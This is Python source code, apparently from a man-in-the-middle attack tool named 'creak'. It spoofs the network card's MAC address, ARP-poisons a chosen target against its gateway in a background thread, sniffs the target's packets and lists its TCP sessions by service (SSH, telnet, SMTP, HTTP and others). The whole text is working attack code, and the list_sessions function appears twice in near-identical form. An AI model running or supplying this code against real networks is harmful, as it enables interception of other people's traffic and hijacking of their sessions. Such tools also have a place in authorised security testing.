def get_mitm(parsed_args): """ create an object of type Mitm based on arguments received """ args = parsed_args if not args.dev: sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface') dev = "%s" % "','".join(args.dev) original_mac_addr = utils.get_mac_by_dev(dev) mac_addr, changed = original_mac_addr, False if not args.source: try: args.source = utils.get_default_gateway_linux() except OSError: args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ') if not utils.is_ipv4(args.source): exit('[!] Unable to retrieve default gateway, please specify one using -s option') else: pass if not args.target: args.target = raw_input('[?] No target address specified, please insert one: ') if not utils.is_ipv4(args.target): exit('[!] Must specify at least one target address') else: if len(args.target) == 1: args.target = ''.join(args.target) conf = ConfigParser.ConfigParser() conf.read('./creak/config') verbose = conf.getboolean('output', 'VERBOSE') debug = conf.getboolean('output', 'DEBUG') if args.verbosity: verbose = True if args.debug: debug = True if args.spoof is True: choice = raw_input('[+] In order to change MAC address ' + G + dev + W + ' must be temporary put down. Proceed?[y/n] ') if choice == 'y': if not args.macaddr and not args.manufacturer: mac_addr = utils.fake_mac_address([], 1) elif args.macaddr and not args.manufacturer: if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr): mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr)) elif args.manufacturer: macs = utils.get_manufacturer(args.manufacturer) mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs))) try: utils.change_mac(dev, mac_addr) changed = True except OSError: pass print("[+] Waiting for wireless reactivation..") if args.mode == 1 or args.mode == 2: time.sleep(10) else: time.sleep(4) # no spoof but set mac address anyway elif args.macaddr: mac_addr = args.macaddr print("[+] Using " + G + mac_addr + W + " MAC address\n" "[+] Set " + G + args.source + W + " as default gateway") if conf.get('output', 'ENGINE').lower() == 'scapy': return (args, changed, original_mac_addr, cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source, args.target, debug, verbose)) return (args, changed, original_mac_addr, cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source, args.target, debug, verbose))
def list_sessions(self, stop, target_b=None, port=None): """ Try to get all TCP sessions of the target """ notorious_services = { 20: ' ftp-data session', 21: ' ftp-data session', 22: ' ssh session', 23: ' telnet session', 25: ' SMTP session', 80: ' HTTP session', 110: ' POP3 session', 143: ' IMAP session', 194: ' IRC session', 220: ' IMAPv3 session', 443: ' SSL session', 445: ' SAMBA session', 989: ' FTPS session', 990: ' FTPS session', 992: ' telnet SSL session', 993: ' IMAP SSL session', 994: ' IRC SSL session' } source = utils.get_default_gateway_linux() if target_b and target_b != self.gateway: source = utils.get_mac_by_ip(target_b) pcap_filter = self._build_pcap_filter("ip host ", port) packets = pcap.pcap(self.dev) packets.setfilter(pcap_filter) # we need only self.target packets # need to create a daemon that continually poison our target poison_thread = Thread(target=self.poison, args=( 2, target_b, )) poison_thread.daemon = True poison_thread.start() print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W + ' and ' + R + (','.join(self.target) if isinstance( self.target, list) else self.target) + W + '\n') sessions = {} try: for _, pkt in packets: if stop(): break eth = dpkt.ethernet.Ethernet(pkt) ip_packet = eth.data if ip_packet.p == dpkt.ip.IP_PROTO_TCP: tcp = ip_packet.data if tcp.flags != dpkt.tcp.TH_RST: sess = "%-25s <-> %25s" % ( inet_ntoa(ip_packet.src) + ":" + str(tcp.sport), inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport)) check = False if sess not in sessions: check = True sessions[sess] = "Others" if tcp.sport in notorious_services: sessions[sess] = notorious_services[tcp.sport] elif tcp.dport in notorious_services: sessions[sess] = notorious_services[tcp.dport] if check is True: print(" [{:^5}] {} : {}".format( len(sessions), sess, sessions[sess])) self.sessions.append(sess) except KeyboardInterrupt: print('[+] Session scan interrupted\n\r') self.restore(2) utils.set_ip_forward(0)
def list_sessions(self, stop, target_b=None, port=None): """ Try to get all TCP sessions of the target """ notorious_services = { 20: ' ftp-data session', 21: ' ftp-data session', 22: ' ssh session', 23: ' telnet session', 25: ' SMTP session', 80: ' HTTP session', 110: ' POP3 session', 143: ' IMAP session', 194: ' IRC session', 220: ' IMAPv3 session', 443: ' SSL session', 445: ' SAMBA session', 989: ' FTPS session', 990: ' FTPS session', 992: ' telnet SSL session', 993: ' IMAP SSL session', 994: ' IRC SSL session' } source = utils.get_default_gateway_linux() if target_b and target_b != self.gateway: source = utils.get_mac_by_ip(target_b) pcap_filter = self._build_pcap_filter("ip host ", port) packets = pcap.pcap(self.dev) packets.setfilter(pcap_filter) # we need only self.target packets # need to create a daemon that continually poison our target poison_thread = Thread(target=self.poison, args=(2, target_b, )) poison_thread.daemon = True poison_thread.start() print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W + ' and ' + R + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n') sessions = {} try: for _, pkt in packets: if stop(): break eth = dpkt.ethernet.Ethernet(pkt) ip_packet = eth.data if ip_packet.p == dpkt.ip.IP_PROTO_TCP: tcp = ip_packet.data if tcp.flags != dpkt.tcp.TH_RST: sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":" + str(tcp.sport), inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport)) check = False if sess not in sessions: check = True sessions[sess] = "Others" if tcp.sport in notorious_services: sessions[sess] = notorious_services[tcp.sport] elif tcp.dport in notorious_services: sessions[sess] = notorious_services[tcp.dport] if check is True: print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess])) self.sessions.append(sess) except KeyboardInterrupt: print('[+] Session scan interrupted\n\r') self.restore(2) utils.set_ip_forward(0)